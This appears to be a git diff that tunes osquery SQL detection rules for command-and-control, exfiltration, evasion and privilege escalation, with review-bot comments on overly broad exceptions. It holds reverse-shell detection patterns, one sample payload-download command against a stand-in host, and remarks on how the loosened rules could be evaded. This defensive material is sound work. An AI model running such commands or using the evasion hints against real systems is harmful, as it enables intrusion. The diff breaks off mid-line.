diff --git a/detection/c2/unexpected-dns-traffic.sql b/detection/c2/unexpected-dns-traffic.sql
index 8d45c09..7191d80 100644
--- a/detection/c2/unexpected-dns-traffic.sql
+++ b/detection/c2/unexpected-dns-traffic.sql
@@ -80,6 +80,7 @@ WHERE
 AND exception_key NOT IN (
 'coredns,0.0.0.0,53',
 'nessusd,50.16.123.71,53',
+ 'Arc Helper,1.0.0.1,53',
 'syncthing,46.162.192.181,53'
 ) -- Local DNS servers and custom clients go here
diff --git a/detection/c2/unexpected-https-client-linux.sql b/detection/c2/unexpected-https-client-linux.sql
index d022f5e..2182a3e 100644
--- a/detection/c2/unexpected-https-client-linux.sql
+++ b/detection/c2/unexpected-https-client-linux.sql
@@ -66,6 +66,7 @@ WHERE
 AND NOT exception_key IN (
 '0,/opt/snapd,0u,0g,snapd',
 '0,/usr/bash,0u,0g,mkinitcpio',
+ '0,/usr/containerd,u,g,containerd',
 '0,/usr/dockerd,0u,0g,dockerd',
 '0,/usr/flatpak-system-helper,0u,0g,flatpak-system-',
 '0,/usr/launcher,0u,0g,launcher',
@@ -75,6 +76,7 @@ WHERE
 '0,/usr/python3.10,0u,0g,dnf',
 '0,/usr/tailscaled,0u,0g,tailscaled',
 '0,/usr/.tailscaled-wrapped,0u,0g,.tailscaled-wra',
+ '105,/usr/http,0u,0g,https',
 '500,/app/slack,u,g,slack',
 '500,/app/thunderbird,u,g,thunderbird',
 '500,/app/zoom.real,u,g,zoom.real',
@@ -93,6 +95,7 @@ WHERE
 '500,/opt/slack,0u,0g,slack',
 '500,/opt/spotify,0u,0g,spotify',
 '500,/usr/abrt-action-generate-core-backtrace,0u,0g,abrt-action-gen',
+ '500,/usr/cargo,0u,0g,cargo',
 '500,/usr/chainctl,0u,0g,chainctl',
 '500,/usr/chrome,0u,0g,chrome',
 '500,/usr/code,0u,0g,code',
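Review bot: The new key `'0,/usr/containerd,u,g,containerd'` carries bare `u,g` in the owner fields where the neighbouring root-daemon entries (`'0,/usr/dockerd,0u,0g,dockerd'`) carry `0u,0g`, so either the binary's owner came back empty when the key was captured or the entry was typed by hand. If it was captured, a comment such as `-- owner uid/gid empty on the capture host` would stop the next reader from "fixing" it to `0u,0g`; if it was typed, the entry will never match and should be re-captured from a live result. The enclosing `NOT exception_key IN (` list continues past the hunk.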
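Review bot: `'105,/usr/http,0u,0g,https'` exempts an outbound HTTPS client running under an unnamed system account (uid 105) whose binary the key reduces to `/usr/http`, and nothing in the hunk says which service that is. Uids in that range are usually allocated per host at package install time, so the key is likely valid only on the machine it was captured from, and anyone able to run code as that account gets a silent HTTPS channel. A one-line comment naming the daemon that runs as uid 105 would make the entry reviewable, and the matching `'80,6,105,/usr/http,...'` line this commit adds to unexpected-talkers-linux.sql should carry the same comment. The exception list continues outside the hunk.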
@@ -110,10 +113,13 @@ WHERE
 '500,/usr/go,500u,500g,go',
 '500,/usr/gvfsd-http,0u,0g,gvfsd-http',
 '500,/usr/java,0u,0g,java',
+ '500,/home/grype,500u,500g,grype',
 '500,/usr/kubectl,500u,500g,kubectl',
+ '500,/usr/signal-desktop,0u,0g,signal-desktop',
 '500,/usr/slack,0u,0g,slack',
 '500,/usr/syncthing,0u,0g,syncthing',
 '500,/usr/terraform,0u,0g,terraform',
+ '500,/usr/trivy,0u,0g,trivy',
 '500,/usr/WebKitNetworkProcess,0u,0g,WebKitNetworkPr',
 '500,/usr/xmobar,0u,0g,xmobar',
 '500,/usr/yay,0u,0g,yay'
diff --git a/detection/c2/unexpected-talkers-linux.sql b/detection/c2/unexpected-talkers-linux.sql
index ddce3b6..e8bc213 100644
--- a/detection/c2/unexpected-talkers-linux.sql
+++ b/detection/c2/unexpected-talkers-linux.sql
@@ -86,6 +86,7 @@ WHERE
 '143,6,500,/app/thunderbird,u,g,thunderbird',
 '22000,6,500,/usr/syncthing,0u,0g,syncthing',
 '22,6,500,/usr/ssh,0u,0g,ssh',
+ '3478,6,500,/opt/chrome,0u,0g,chrome',
 '4070,6,500,/opt/spotify,0u,0g,spotify',
 '5228,6,500,/opt/chrome,0u,0g,chrome',
 '5228,6,500,/usr/chrome,0u,0g,chrome',
@@ -95,9 +96,11 @@ WHERE
 '80,6,0,/usr/NetworkManager,0u,0g,NetworkManager',
 '80,6,0,/usr/packagekitd,0u,0g,packagekitd',
 '80,6,0,/usr/pacman,0u,0g,pacman',
+ '80,6,500,/usr/pacman,0u,0g,pacman',
 '80,6,0,/usr/python3.10,0u,0g,yum',
 '80,6,0,/usr/tailscaled,0u,0g,tailscaled',
 '80,6,0,/usr/.tailscaled-wrapped,0u,0g,.tailscaled-wra',
+ '80,6,105,/usr/http,0u,0g,http',
 '80,6,500,/app/thunderbird,u,g,thunderbird',
 '80,6,500,/opt/chrome,0u,0g,chrome',
 '80,6,500,/opt/firefox,0u,0g,firefox',
diff --git a/detection/c2/unexpected-talkers-macos.sql b/detection/c2/unexpected-talkers-macos.sql
index 36ea03e..98449c8 100644
--- a/detection/c2/unexpected-talkers-macos.sql
+++ b/detection/c2/unexpected-talkers-macos.sql
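Review bot: `'500,/home/grype,500u,500g,grype'` exempts a user-owned binary living under a home directory, so anything running as that user that drops a `grype`-named executable in a matching `/home/...` location can open HTTPS connections without tripping this query; the sibling `'500,/usr/trivy,0u,0g,trivy'` added in the same hunk is at least root-owned. If grype has to live in the home directory, mark the weaker key with a comment (`-- grype: user-installed, user-owned; weaker than the /usr entries`), otherwise installing it into a root-owned prefix would let the key be `'500,/usr/grype,0u,0g,grype'`. The list continues beyond the hunk.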
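Review bot: `'80,6,500,/usr/pacman,0u,0g,pacman'` allows pacman running as an unprivileged user (uid 500) to talk plaintext HTTP alongside the existing root entry; since pacman normally needs root to sync, recording which non-root invocation produced this (a download-only run or a wrapper) would keep the entry from being read as a bypass later. `'80,6,105,/usr/http,0u,0g,http'` has the same unnamed-uid problem as the https-client entry in this commit: uid 105 is host-specific and the hunk does not say which service it is. A one-line comment naming the daemon for both entries is the minimal fix; the `IN (` list continues outside the hunk.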
@@ -183,6 +183,7 @@ WHERE
 '443,6,500,git-remote-http,git-remote-http-555549448cff17dcad50330caee64c85205e6a99,',
 '443,6,500,git-remote-http,git-remote-http-5555494493930c47f9d9385e94cdee8b19968153,',
 '443,6,500,git-remote-http,git-remote-http-55554944ce011d0e889a3cf58e5ac97ac15728f3,',
+ '443,6,500,git-remote-http,git-remote-http-55554944e0748565fb2d356b9eb3edf61873140d,',
 '443,6,500,git-remote-http,git-remote-http-55554944e5dca79a2b44332e941af547708b0c68,',
 '443,6,500,gitsign,,',
 '443,6,500,gitsign,a.out,',
@@ -224,6 +225,7 @@ WHERE
 '443,6,500,Slack Helper,,',
 '443,6,500,Slack Helper,com.tinyspeck.slackmacgap.helper,Apple Mac OS Application Signing',
 '443,6,500,Slack Helper,com.tinyspeck.slackmacgap.helper,Developer ID Application: Slack Technologies, Inc. (BQR82RBBHL)',
+ '443,6,500,snyk,snyk_darwin_amd64,Developer ID Application: Snyk Limited (97QYW7LHSF)',
 '443,6,500,steam_osx,com.valvesoftware.steam,Developer ID Application: Valve Corporation (MXGJJ98X76)',
 '443,6,500,step,step,',
 '443,6,500,sublime_text,com.sublimetext.4,Developer ID Application: Sublime HQ Pty Ltd (Z6D26JE4Y4)',
diff --git a/detection/collection/high-disk-bytes-written.sql b/detection/collection/high-disk-bytes-written.sql
index 3493c05..00cfd5e 100644
--- a/detection/collection/high-disk-bytes-written.sql
+++ b/detection/collection/high-disk-bytes-written.sql
@@ -33,6 +33,7 @@ WHERE
 AND p.path NOT IN (
 '/bin/bash',
 '/opt/homebrew/bin/qemu-system-aarch64',
+ '/usr/bin/apt',
 '/usr/bin/aptd',
 '/usr/bin/bash',
 '/usr/bin/bwrap',
@@ -41,6 +42,7 @@ WHERE
 '/usr/bin/dockerd',
 '/usr/bin/fish',
 '/usr/bin/gnome-shell',
+ '/usr/bin/gnome-software',
 '/usr/bin/make',
 '/usr/bin/melange',
 '/usr/bin/qemu-system-x86_64',
@@ -96,14 +98,14 @@ WHERE
 'containerd',
 'esbuild',
 'firefox',
+ 'fsdaemon',
 'go',
- 'grype',
 'goland',
- 'java',
- 'launcher',
 'gopls',
+ 'grype',
+ 'java',
 'jetbrains-toolb',
- 'slack',
+ 'launcher',
 'slack',
 'wineserver'
 )
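Review bot: `'fsdaemon'` is added to what appears to be a process-name list (`'containerd'`, `'esbuild'`, ...) rather than to the `p.path NOT IN (` list earlier in the file, so the exemption is keyed on a name the process chooses for itself and any heavy writer that calls itself fsdaemon inherits it. If the daemon has a stable install path, moving it to the path list with a comment (`-- fsdaemon: <install path>`) is the stronger form, and the same applies to the `'fleet_backend'` and `'fsdaemon'` names this commit adds to high_disk_bytes_read.sql. The re-sort of grype/java/launcher and the dropped duplicate `'slack'` look fine.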
diff --git a/detection/credentials/unexpected-sensitive-file-access-linux.sql b/detection/credentials/unexpected-sensitive-file-access-linux.sql
index cdd5529..7024051 100644
--- a/detection/credentials/unexpected-sensitive-file-access-linux.sql
+++ b/detection/credentials/unexpected-sensitive-file-access-linux.sql
@@ -79,6 +79,7 @@ WHERE
 'chrome_crashpad_handler,chrome_crashpad,~/.config/google-chrome',
 'chrome,chrome,~/.config/google-chrome',
 'firefox,.firefox-wrappe,~/.cache/mozilla',
+ 'firefox,Web Content,~/.mozilla/firefox',
 'firefox,.firefox-wrappe,~/.mozilla/firefox',
 'firefox,file:// Content,~/.mozilla/firefox',
 'firefox,firefox,~/.cache/mozilla',
diff --git a/detection/evasion/hidden-cwd.sql b/detection/evasion/hidden-cwd.sql
index 8708287..2bf8b8b 100644
--- a/detection/evasion/hidden-cwd.sql
+++ b/detection/evasion/hidden-cwd.sql
@@ -1,4 +1,4 @@
--- Programs running with a hidden current working directory
+-- Programs running with a hidden current working directory (state-based)
 --
 -- false positives:
 -- * Users rummaging through their configuration files
@@ -68,9 +68,11 @@ WHERE
 'npm install,~/.npm/_cacache',
 'mysqld,~/.local/share'
 )
+ OR exception_key LIKE '%sh,~/.Trash/%'
 OR dir IN (
 '~/.config',
 '~/.vim',
+ '~/.terraform.d',
 '~/.cache/yay',
 '~/.local/share/chezmoi',
 '~/.local/share/nvim',
@@ -104,4 +106,7 @@ WHERE
 OR dir LIKE '~/%/.terraform%'
 OR dir LIKE '~/.vscode/extensions/%'
 OR dir LIKE '~/.zsh/%'
+ OR dir LIKE '~/%/.git' -- For sudo calls to other things
+ OR (dir LIKE '/home/.terraform.d/%' AND p.euid = 0)
 )
diff --git a/detection/evasion/unexpected-kernel-modules-linux.sql b/detection/evasion/unexpected-kernel-modules-linux.sql
index 509b836..6815815 100644
--- a/detection/evasion/unexpected-kernel-modules-linux.sql
+++ b/detection/evasion/unexpected-kernel-modules-linux.sql
@@ -60,6 +60,7 @@ WHERE
 'cmac',
 'configfs',
 'coretemp',
+ 'cpuid',
 'cqhci',
 'crc16',
 'crc32c_generic',
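Review bot: `OR exception_key LIKE '%sh,~/.Trash/%'` has a leading wildcard, so it exempts any process whose name ends in `sh` — `bash`/`zsh`/`fish`, but also `ssh` or a deliberately renamed binary — as long as its cwd is anywhere under `~/.Trash/`, which is one of the hidden directories this query exists to flag. If the intent is interactive shells poking at trashed files, enumerate them: `OR (p.name IN ('bash', 'zsh', 'fish') AND dir LIKE '~/.Trash/%')`, assuming `p` is the processes alias that `p.euid` later in the file refers to. A comment stating the false positive being suppressed would also help; the `OR dir IN (` list continues past the hunk.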
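Review bot: `OR (dir LIKE '/home/.terraform.d/%' AND p.euid = 0)` matches a path with no username component between `/home/` and `/.terraform.d`, which does not exist on a normal layout, so either `dir` is already a normalized form here (and the comment should say so) or the pattern wants `'/home/%/.terraform.d/%'`. The `euid = 0` guard is the right instinct for the sudo case, but the rationale reads better on the line it applies to, e.g. `-- terraform under sudo: root inherits the invoking user's ~/.terraform.d as cwd`. `OR dir LIKE '~/%/.git'` only matches when the cwd is the `.git` directory itself and looks fine.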
@@ -194,6 +195,7 @@ WHERE
 'ip6table_nat',
 'ip6table_raw',
 'ip6_tables',
+ 'ip6table_security',
 'ip6t_REJECT',
 'ip6t_rpfilter',
 'ip6t_rt',
diff --git a/detection/evasion/unexpected-var-executables-macos.sql b/detection/evasion/unexpected-var-executables-macos.sql
index dd4f36b..4a7f216 100644
--- a/detection/evasion/unexpected-var-executables-macos.sql
+++ b/detection/evasion/unexpected-var-executables-macos.sql
@@ -14,11 +14,14 @@ SELECT
 file.mtime,
 file.size,
 hash.sha256,
- magic.data
+ magic.data,
+ signature.authority,
+ signature.identifier
 FROM
 file
 LEFT JOIN hash on file.path = hash.path
 LEFT JOIN magic ON file.path = magic.path
+ LEFT JOIN signature ON file.path = signature.path
 WHERE
 (
 -- This list is the result of multiple queries combined and can likely be minimized
@@ -42,6 +45,7 @@ WHERE
 AND file.path NOT LIKE '/var/tmp/IN_PROGRESS_sysdiagnose_%.tmp/mddiagnose.mdsdiagnostic/diagnostic.log'
 AND file.path NOT LIKE '/var/tmp/epdfinfo%'
 AND file.path NOT LIKE '/var/folders%/T/sp_relauncher'
+ AND file.path NOT LIKE '/var/folders/pv/%/C/com.apple.FontRegistry/annex_aux'
 AND (
 file.mode LIKE '%7%'
 or file.mode LIKE '%5%'
diff --git a/detection/execution/exotic-command-events-linux.sql b/detection/execution/exotic-command-events-linux.sql
index b9b1d58..95d92b2 100644
--- a/detection/execution/exotic-command-events-linux.sql
+++ b/detection/execution/exotic-command-events-linux.sql
@@ -103,7 +103,7 @@ WHERE
 OR cmd LIKE '%sh -i'
 OR cmd LIKE '%socat%'
 OR cmd LIKE '%SOCK_STREAM%'
- OR cmd LIKE '%Socket.%'
+ OR (cmd LIKE '%Socket.%' AND NOT cmd LIKE '%ipc-socket%')
 ) -- Things that could reasonably happen at boot.
 AND NOT (
 p.path IN ('/usr/bin/kmod', '/bin/kmod')
@@ -135,3 +135,4 @@ WHERE
 AND NOT cmd IN ('lsmod')
 -- Seen on Ubuntu
 AND NOT cmd LIKE 'rm -f /tmp/apt-key-gpghome.%/pubring.gpg'
+ AND NOT cmd LIKE 'rm -f /var/tmp/mkinitramfs_%'
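Review bot: `'/var/folders/pv/%/C/com.apple.FontRegistry/annex_aux'` hard-codes `pv`, the per-user hashed component of `/var/folders/<xx>/<random>/`, so the exception only matches the one account it was captured from and the same file under any other user still fires; the existing `'/var/folders%/T/sp_relauncher'` line two above already uses the wildcard form. `AND file.path NOT LIKE '/var/folders/%/C/com.apple.FontRegistry/annex_aux'` is the consistent pattern. Since this commit also joins `signature`, keying such exemptions on `signature.authority` rather than path alone would be tighter wherever the file is signed.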
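Review bot: `AND NOT cmd LIKE '%ipc-socket%'` is a substring test on the attacker-controlled command line, so once it is known, appending `ipc-socket` anywhere in argv switches off the `Socket.` check for that command. If the false positive comes from one program's `--ipc-socket` flag, anchoring the exception to that program (its `p.path`, or a `cmd LIKE '<program> %--ipc-socket%'` prefix) costs nothing and cannot be satisfied by a stray argument. A comment recording which tool emits it would help whoever tunes this block next; the `AND NOT (` boot-time block continues past the hunk.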
diff --git a/detection/execution/recently-created-executables-linux.sql b/detection/execution/recently-created-executables-linux.sql
index b41c4b2..cb3e621 100644
--- a/detection/execution/recently-created-executables-linux.sql
+++ b/detection/execution/recently-created-executables-linux.sql
@@ -37,6 +37,7 @@ WHERE
 AND (p.start_time - MAX(f.ctime, f.btime)) < 180
 AND p.start_time >= MAX(f.ctime, f.ctime)
 AND NOT f.directory IN ('/usr/lib/firefox', '/usr/local/kolide-k2/bin') -- Typically daemons or long-running desktop apps
+ -- These are binaries that get installed/updated often enough that we should just mask them
 AND NOT p.path IN (
 '',
 '/opt/google/chrome/chrome',
@@ -46,6 +47,9 @@ WHERE
 '/usr/bin/dockerd',
 '/usr/bin/gedit',
 '/usr/bin/obs',
+ '/usr/bin/docker-proxy',
+ '/usr/lib/google-cloud-sdk/platform/bundledpythonunix/bin/python3',
+ '/usr/lib/snapd/snapd',
 '/usr/bin/pipewire',
 '/usr/bin/tailscaled',
 '/usr/bin/udevadm',
@@ -68,6 +72,7 @@ WHERE
 '/usr/lib/systemd/systemd-timesyncd',
 '/usr/lib/x86_64-linux-gnu/obs-plugins/obs-browser-page',
 '/usr/lib/xf86-video-intel-backlight-helper',
+ '/usr/bin/containerd-shim-runc-v2',
 '/usr/sbin/chronyd',
 '/usr/sbin/cupsd',
 '/usr/sbin/tailscaled'
diff --git a/detection/execution/recently-created-executables-macos.sql b/detection/execution/recently-created-executables-macos.sql
index 390d169..10c55d8 100644
--- a/detection/execution/recently-created-executables-macos.sql
+++ b/detection/execution/recently-created-executables-macos.sql
@@ -52,6 +52,7 @@ WHERE
 'Developer ID Application: Galvanix (5BRAQAFB8B)',
 'Developer ID Application: General Arcade (Pte. Ltd.) (S8JLSG5ES7)',
 'Developer ID Application: GEORGE NACHMAN (H7V7XYVQ7D)',
+ 'Developer ID Application: Zoom Video Communications, Inc. (BJ4HAAB9B3)',
 'Developer ID Application: JetBrains s.r.o. (2ZEFAR8TH3)',
 'Developer ID Application: GitHub (VEKTX9H2N7)',
 'Developer ID Application: Google LLC (EQHXZ8M8AV)',
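Review bot: The context line `AND p.start_time >= MAX(f.ctime, f.ctime)` compares against `f.ctime` twice, which reduces to `p.start_time >= f.ctime` and ignores `f.btime`; the line above uses `MAX(f.ctime, f.btime)`, so this looks like a typo sitting right above the comment this commit adds. Writing `AND p.start_time >= MAX(f.ctime, f.btime)` would make both bounds use the same timestamp. The new comment is useful; phrasing it as a rationale, e.g. `-- Frequently reinstalled/updated binaries; masked rather than tuned`, reads slightly better than "we should just mask them".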
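Review bot: The three added paths are inserted after `'/usr/bin/obs'` even though `'/usr/bin/docker-proxy'` sorts before `'/usr/bin/dockerd'` and the two `/usr/lib/...` entries belong with the `/usr/lib` block the next hunk touches; keeping this list sorted is what makes duplicates and stale entries visible on review. `'/usr/lib/google-cloud-sdk/platform/bundledpythonunix/bin/python3'` also exempts an interpreter rather than a daemon, which is broader than the rest of the list and deserves a one-line comment on why the bundled python shows up as recently created (presumably gcloud self-updates). The list continues outside the hunk.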
@@ -83,6 +84,7 @@ WHERE
 AND NOT p.path LIKE '/private/var/folders/%/T/pulumi-go.%'
 AND NOT p.path LIKE '/Users/%/bin/%'
 AND NOT p.path LIKE '/Users/%/code/%'
+ AND NOT p.path LIKE '/Users/%/src/%'
 AND NOT p.path LIKE '/Users/%/Library/Application Support/%/Contents/MacOS/%'
 AND NOT p.path LIKE '/Users/%/Library/Application Support/iTerm2/iTermServer-%'
 AND NOT p.path LIKE '/Users/%/Library/Caches/%/Contents/MacOS/%'
@@ -94,6 +96,7 @@ WHERE
 AND NOT p.path LIKE '/usr/local/Cellar/%'
 AND NOT p.path LIKE '/usr/local/kolide-k2/bin/osqueryd-updates/%/osqueryd'
 AND NOT p.path LIKE '%/.vscode/extensions/%'
+ AND NOT p.path LIKE '/Users/%/Library/Caches/snyk/%/snyk-macos'
 AND NOT (
 p.path LIKE '/Users/%'
 AND p.uid > 499
diff --git a/detection/execution/sketchy-fetcher.sql b/detection/execution/sketchy-fetcher.sql
index 42955db..b037cdc 100644
--- a/detection/execution/sketchy-fetcher.sql
+++ b/detection/execution/sketchy-fetcher.sql
@@ -80,6 +80,7 @@ WHERE
 OR parent_cmdline LIKE '/nix/store/%-builder.sh'
 OR p.cmdline LIKE 'git %'
 OR p.cmdline LIKE '%LICENSES/vendor/%'
+ OR p.cmdline LIKE 'curl -sL wttr.in%'
 OR p.cmdline LIKE '%localhost:%'
 OR p.cmdline LIKE '%127.0.0.1:%'
 OR p.name IN ('apko')
diff --git a/detection/execution/unexpected-execdir-events-macos.sql b/detection/execution/unexpected-execdir-events-macos.sql
index 543c002..36c51e8 100644
--- a/detection/execution/unexpected-execdir-events-macos.sql
+++ b/detection/execution/unexpected-execdir-events-macos.sql
@@ -96,6 +96,7 @@ WHERE
 AND dirname NOT LIKE '/usr/libexec/%'
 AND dirname NOT LIKE '/usr/local/%'
 AND dirname NOT LIKE '/Volumes/com.getdropbox.dropbox-%'
+ AND dirname NOT LIKE '/private/tmp/KSInstallAction.%/Install Google Software Update.app/Contents/Helpers'
 -- Unexplained data issue
 AND dirname NOT LIKE '../%'
 AND p.path NOT IN (
diff --git a/detection/execution/unexpected-osascript-calls.sql b/detection/execution/unexpected-osascript-calls.sql
index a806e1c..cba7210 100644
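Review bot: `AND NOT p.path LIKE '/Users/%/src/%'` masks every freshly built executable under any user's `src` tree, which together with the existing `bin` and `code` exemptions covers most of the places a dropped payload would land on a developer machine. If the noise is local builds, fold it into the `AND NOT (p.path LIKE '/Users/%' AND p.uid > 499 ...)` block later in the file, which already scopes home-directory exemptions to non-system uids, rather than adding an unconditional path wildcard. A comment (`-- local source builds`) would at least record the intent; the `AND NOT` chain continues past the hunk.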
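Review bot: `AND NOT p.path LIKE '/Users/%/Library/Caches/snyk/%/snyk-macos'` is a path-only exemption inside a user-writable cache directory, so anything written there and named `snyk-macos` is ignored. This file already keys exemptions on `signature.authority` (the hunk at line 52 adds Zoom's Developer ID), and this same commit records Snyk's identity as `Developer ID Application: Snyk Limited (97QYW7LHSF)` in unexpected-talkers-macos.sql, so adding that string to the authority list would cover the cached binary without trusting the path. If the cached binary turns out to be unsigned, say so in a comment next to the path so the weaker match is clearly deliberate. The `AND NOT (` block continues beyond the hunk.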
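Review bot: `OR p.cmdline LIKE 'curl -sL wttr.in%'` has no terminator after the host, so it also matches a command line such as `curl -sL wttr.intruder.example/payload -o /tmp/x` whose host merely starts with `wttr.in`. Anchoring the host with a slash or an exact match, e.g. `OR p.cmdline LIKE 'curl -sL wttr.in/%' OR p.cmdline = 'curl -sL wttr.in'`, keeps the weather lookup quiet without handing the fetcher detection a free prefix. The surrounding `OR` chain continues outside the hunk.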
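Review bot: `'/private/tmp/KSInstallAction.%/Install Google Software Update.app/Contents/Helpers'` sits under the world-writable `/private/tmp`, so any local process can create a directory of that shape and execute from it unflagged; a path-only exemption there proves a known-good name, not a known-good origin. The executions this suppresses appear to be Google's Keystone installer helpers, so the stronger gate is the signer — `AND NOT (dirname LIKE '/private/tmp/KSInstallAction.%/Install Google Software Update.app/Contents/Helpers' AND signature.authority = 'Developer ID Application: Google LLC (EQHXZ8M8AV)')`, using the authority string this repo already lists in recently-created-executables-macos.sql — provided the `signature` table is joined in this query (not visible in the hunk). A comment naming Keystone as the source would help either way; the `AND` chain continues past the hunk.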
--- a/detection/execution/unexpected-osascript-calls.sql
+++ b/detection/execution/unexpected-osascript-calls.sql
@@ -48,6 +48,7 @@ WHERE
 p.path = '/usr/bin/osascript'
 AND p.time > (strftime('%s', 'now') -60)
 AND exception_key NOT IN (
+ ',,osascript',
 'com.vng.zalo,Developer ID Application: VNG ONLINE CO.,LTD (CVB6BX97VM),osascript -ss'
 )
 AND cmd NOT IN ('osascript -e user locale of (get system info)')
diff --git a/detection/exfil/high_disk_bytes_read.sql b/detection/exfil/high_disk_bytes_read.sql
index 62c4083..43ba0e9 100644
--- a/detection/exfil/high_disk_bytes_read.sql
+++ b/detection/exfil/high_disk_bytes_read.sql
@@ -39,13 +39,14 @@ WHERE
 'emacs',
 'firefox',
 'fish',
+ 'fleet_backend',
+ 'fsdaemon',
 'GoogleSoftwareUpdateAgent',
 'gopls',
 'java',
 'launcher',
 'LogiFacecamService',
 'nautilus',
- 'systemd',
 'nessusd',
 'nix',
 'osqueryd',
@@ -53,18 +54,22 @@ WHERE
 'qemu-system-x86',
 'qemu-system-x86-64',
 'slack',
+ 'systemd',
 'wineserver',
 'ykman-gui',
 'zsh'
 )
 AND NOT p.path IN (
+ '/usr/bin/apt',
 '/usr/bin/darktable',
 '/usr/bin/dockerd',
 '/usr/bin/gnome-shell',
 '/usr/bin/udevadm',
 '/usr/libexec/aned',
 '/usr/libexec/coreduetd',
+ '/usr/libexec/flatpak-system-helper',
 '/usr/libexec/logd',
+ '/usr/libexec/logd_helper',
 '/usr/libexec/packagekitd',
 '/usr/libexec/PerfPowerServices',
 '/usr/libexec/signpost_reporter',
diff --git a/detection/persistence/unexpected-active-systemd-units.sql b/detection/persistence/unexpected-active-systemd-units.sql
index 38c2b89..98c52b5 100644
--- a/detection/persistence/unexpected-active-systemd-units.sql
+++ b/detection/persistence/unexpected-active-systemd-units.sql
@@ -10,6 +10,8 @@ SELECT
 description AS 'desc',
 fragment_path AS path,
+ MAX(user, "root") AS effective_user,
+ following,
 hash.sha256,
 file.ctime,
 file.size,
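Review bot: `',,osascript'` exempts an `osascript` invocation with no arguments whose parent has neither a bundle identifier nor a signing authority, and bare `osascript` reads its script from stdin, which is exactly how a dropped script or a `curl | osascript` one-liner presents; the existing Zalo entry at least pins a signer. If this came from an interactive terminal session, scope it to that parent (its path or bundle id) instead of to "unsigned anything", and add a comment saying what produced it. As written the entry removes most of this query's coverage for the unsigned-parent case.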
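Review bot: `MAX(user, "root") AS effective_user` does not compute a default: in SQLite the multi-argument `max()` returns NULL when any argument is NULL, so a unit with no `user` yields NULL rather than `root`, and for a unit that does have one it returns whichever string sorts higher, which is `root` for any account name that sorts below it. The intended fallback is `COALESCE(NULLIF(user, ''), 'root') AS effective_user`. The double-quoted `"root"` is also an identifier in standard SQL that only behaves as a string because SQLite falls back to a literal when no such column exists; use single quotes. The SELECT list continues outside the hunk.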
@@ -381,9 +383,10 @@ WHERE
 'zpool-trim.timer,zpool-trim.timer,,0'
 )
 OR exception_key LIKE 'machine-qemu%,Virtual Machine qemu%,,300'
+ OR exception_key LIKE 'dbus-:1.%-org.freedesktop.problems@%.service,dbus-:%.%-org.freedesktop.problems@%.service,0,200'
 OR id LIKE 'blockdev@dev-mapper-luks%.target'
 OR id LIKE 'blockdev@dev-mapper-nvme%.target'
- OR id LIKE 'dbus-:%-org.freedesktop.problems@0.service'
+ OR id LIKE ''
 OR id LIKE 'dev-disk-by%.swap'
 OR id LIKE 'dev-mapper-%.swap'
 OR id LIKE 'dev-zram%.swap'
diff --git a/detection/persistence/unexpected-uid0-daemon-linux.sql b/detection/persistence/unexpected-uid0-daemon-linux.sql
index c60bc13..d6098a7 100644
--- a/detection/persistence/unexpected-uid0-daemon-linux.sql
+++ b/detection/persistence/unexpected-uid0-daemon-linux.sql
@@ -50,6 +50,8 @@ WHERE
 '/usr/bin/containerd',
 '/usr/bin/containerd-shim-runc-v2',
 '/usr/bin/crond',
+ '/usr/bin/dbus-daemon',
+ '/usr/bin/dbus-launch',
 '/usr/bin/dockerd',
 '/usr/bin/docker-proxy',
 '/usr/bin/fish',
@@ -61,10 +63,6 @@ WHERE
 '/usr/bin/pacman',
 '/usr/bin/sshd',
 '/usr/bin/tailscaled',
- '/usr/libexec/xdg-permission-store',
- '/usr/libexec/xdg-document-portal',
- '/usr/b
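Review bot: `OR id LIKE ''` is a leftover from moving the old `dbus-:%-org.freedesktop.problems@0.service` exception into the `exception_key LIKE` line above; it can only match a unit with an empty id and otherwise adds a dead branch to an already long `OR` chain. Delete the line. The replacement `exception_key LIKE 'dbus-:1.%-org.freedesktop.problems@%.service,dbus-:%.%-org.freedesktop.problems@%.service,0,200'` does carry the `0,200` tail the old `id LIKE` lacked, which is the tighter match; the `OR` chain continues past the hunk.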
+++ b/detection/privesc/unexpected-privilege-escalation-events.sql
@@ -36,20 +36,19 @@ WHERE
 p.time > (strftime('%s', 'now') -30)
 AND p.euid < pp.euid
 AND p.path NOT IN (
+ '/bin/ps',
+ '/usr/bin/doas',
 '/usr/bin/fusermount',
 '/usr/bin/fusermount3',
 '/usr/bin/login',
 '/usr/bin/sudo',
- '/usr/bin/doas',
- '/bin/ps',
- '/usr/bin/top'
+ '/usr/bin/top',
+ '/usr/lib/snapd/snap-confine',
+ '/usr/lib/snapd/snap-update-ns'
 )
 AND p.path NOT LIKE '/nix/store/%/bin/sudo'
 AND p.path NOT LIKE '/nix/store/%/bin/dhcpcd'
- AND NOT (
- p.path LIKE '/snap/snapd/%/usr/lib/snapd/snap-confine'
- AND parent_path = '/usr/lib/systemd/systemd'
- )
+ AND p.path NOT LIKE '/snap/snapd/%/usr/lib/snapd/snap-confine'
 AND NOT (
 child_name = 'polkit-agent-helper-1'
 AND parent_path = '/usr/bin/gnome-shell'
@@ -58,3 +57,7 @@ WHERE
 child_name = 'fusermount3'
 AND parent_path = '/usr/lib/xdg-document-portal'
 )
+ AND NOT (
+ child_name IN ('dash', 'pkexec')
+ AND parent_path = '/usr/bin/update-notifier'
+ )
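Review bot: Replacing `AND NOT (p.path LIKE '/snap/snapd/%/usr/lib/snapd/snap-confine' AND parent_path = '/usr/lib/systemd/systemd')` with a bare `AND p.path NOT LIKE '/snap/snapd/%/usr/lib/snapd/snap-confine'`, and adding `/usr/lib/snapd/snap-confine` and `snap-update-ns` to the path list, drops the only parent constraint on a helper that normally runs setuid root, so any process that execs snap-confine and lands at a lower euid than its parent is now exempt regardless of who launched it. If the systemd-only form was too narrow because user-driven `snap run` invocations also trip it, widen the parent set with a `parent_path IN (...)` list of the launchers actually observed rather than removing the check, and apply the same shape to `snap-update-ns`. A comment on why the parent check was dropped is the minimum; the block continues past the hunk.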
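Review bot: `child_name IN ('dash', 'pkexec') AND parent_path = '/usr/bin/update-notifier'` exempts a generic shell: a `dash` whose euid is lower than update-notifier's is a privilege change into a shell, which is the shape this query is written to catch, and `child_name` is only a basename, so any escalation that ends in something named `dash` under that parent goes silent. If the legitimate case is a pkexec-launched helper script, keep `child_name = 'pkexec'` here and exempt the shell on its observed command line instead of on its name. A comment recording that command line would make the entry auditable; the `AND NOT (` block closes within the hunk.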